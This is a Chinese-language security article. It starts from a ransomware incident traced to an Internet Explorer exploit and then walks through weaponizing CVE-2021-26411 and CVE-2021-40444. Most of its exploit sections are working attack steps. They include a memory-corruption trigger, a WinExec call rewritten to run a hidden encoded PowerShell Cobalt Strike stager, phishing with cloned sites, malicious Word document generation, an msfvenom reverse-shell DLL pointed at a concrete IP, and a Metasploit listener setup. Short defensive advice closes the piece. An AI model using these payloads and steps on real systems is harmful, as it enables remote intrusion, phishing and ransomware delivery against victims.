IE浏览器漏洞利用与钓鱼攻击技术深度解析

一、勒索病毒应急响应案例分析

1.1 案例背景

某公司一年内三次遭受勒索病毒攻击，最新一次攻击方式与以往不同：

• 非通过SMB/RDP服务暴力破解传播
• 利用IE浏览器漏洞远程加载恶意程序
• 采用文件不落地方式进行投毒

1.2 溯源分析过程

1.2.1 初始分析

• 检查常规攻击路径（445/3389端口爆破）未发现异常
• 使用日志分析工具evtxLogparse未发现暴力破解痕迹

1.2.2 关键发现

• 受害者使用Windows 7系统和老版本IE浏览器
• 浏览器历史记录中发现可疑域名访问：

  0v2726xb2736ad7z.gosgrew.quest
  

• 域名特征：
  • 随机命名
  • 注册时间短
  • 通过水坑攻击跳转

1.3 攻击链条还原

1. 受害者访问被入侵网站：http://eudoxia-myr.com/favicon.ico
2. 自动跳转到恶意域名：http://0v2726xb2736ad7z.gosgrew.quest/
3. 利用IE漏洞CVE-2021-26411进行RCE投毒

二、IE浏览器漏洞深度解析

2.1 CVE-2021-26411（Internet Explorer内存损坏漏洞）

2.1.1 漏洞概述

• 类型：远程代码执行漏洞
• 原理：内存损坏导致任意代码执行
• 可调用Windows API或执行shellcode

2.1.2 影响范围

• Internet Explorer 11
• Microsoft Edge (EdgeHTML-based)
• Windows 7 SP1至Windows 10 20H2
• Windows Server 2008至2019

2.1.3 利用条件

• 无需用户认证
• 远程触发
• 需使用IE11浏览器

2.1.4 POC核心分析

// 关键利用技术
function alloc1() {
  var view = new DataView(abf)
  var str = ''
  for (var i = 4; i < abf.byteLength - 2; i += 2)
    str += '%u' + pad0(view.getUint16(i, true).toString(16))
  var result = document.createAttribute('alloc')
  result.nodeValue = unescape(str)
  return result
}

function triggerExploit() {
  // 创建恶意属性节点
  var att = document.createAttribute('attribute')
  att.nodeValue = {
    valueOf: function() {
      // 触发漏洞的回调函数
      hd1.nodeValue = (new alloc1()).nodeValue
      ele.clearAttributes()
      hd2 = hd1.cloneNode()
      ele.setAttribute('attribute', 1337)
    }
  }
  
  // 绑定并触发
  ele.setAttributeNode(att)
  ele.setAttribute('attr', '0'.repeat((0x20010 - 6) / 2))
  ele.removeAttributeNode(att)
}

2.1.5 POC改造实战

原始POC执行calc.exe：

var kernel32 = call2(LoadLibraryExA,[newStr('kernel32.dll',0,1)])
var WinExec = getProcAddr(kernel32,'WinExec')
call2(WinExec,[newStr('calc.exe'),5])

改造为执行系统命令：

call2(WinExec,[newStr('cmd.exe /k whoami'),5])

2.1.6 实战利用 - CS上线

通过cmd调用PowerShell上线Cobalt Strike：

call2(WinExec,[newStr('cmd.exe /k powershell -nop -w hidden -encodedcommand <base64>'),5])

2.1.7 钓鱼场景应用

• 克隆目标网站
• 添加提示"网站只允许IE浏览器打开"
• 利用漏洞自动执行恶意代码

2.2 CVE-2021-40444（MSHTML远程代码执行漏洞）

2.2.1 漏洞概述

• 通过恶意ActiveX控件在Office文档中执行代码
• MSHTML(Trident)引擎漏洞
• 微软确认存在在野利用

2.2.2 影响范围

• Windows全系列（从Win7到Win10 21H1）
• 影响载体：
  • Word/Excel/PowerPoint文档
  • IE浏览器

2.2.3 利用条件

IE利用条件：

• 启用ActiveX控件和插件

Office利用条件：

• 直接通过Word/Excel/PowerPoint文档触发

2.2.4 漏洞复现步骤

1. 安装依赖工具：

wget http://ftp.debian.org/debian/pool/main/l/lcab/lcab_1.0b12.orig.tar.gz
tar zxvf lcab_1.0b12.orig.tar.gz
cd lcab-1.0b12
./configure
make
sudo make install

2. 使用POC生成恶意文档：

python3 exploit.py generate test/calc.dll http://vps-ip:8088

3. 启动HTTP服务：

python3 exploit.py host 8088

4. 生成的恶意文档路径：/out/document.docx

2.2.5 POC结构分析

解压document.docx后关键文件：

• word/_rels/document.xml.rels

  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://x.x.x.x/word.html" TargetMode="External"/>
  

2.2.6 MSF上线实战

1. 生成恶意DLL：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=110.40.137.64 LPORT=2345 -f dll > 2.dll

2. 配置攻击环境：

python3 exploit.py generate test/2.dll http://x.x.x.x
python3 exploit.py host 80

3. 设置监听：

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST x.x.x.x
set LPORT 2345
run

三、防御建议

3.1 针对CVE-2021-26411

• 升级IE浏览器到最新版本
• 禁用过时的ActiveX控件
• 部署网络流量监控，检测异常域名访问

3.2 针对CVE-2021-40444

• 安装微软官方补丁
• 禁用Office中的ActiveX控件
• 配置组策略限制HTML内容执行

3.3 通用防御措施

1. 终端防护：

   • 启用应用程序白名单
   • 部署行为检测机制

2. 安全意识：

   • 培训员工识别钓鱼网站
   • 禁止使用过时浏览器访问重要系统

3. 应急响应：

   • 定期检查浏览器历史记录
   • 部署日志集中分析系统
   • 建立勒索病毒应急响应预案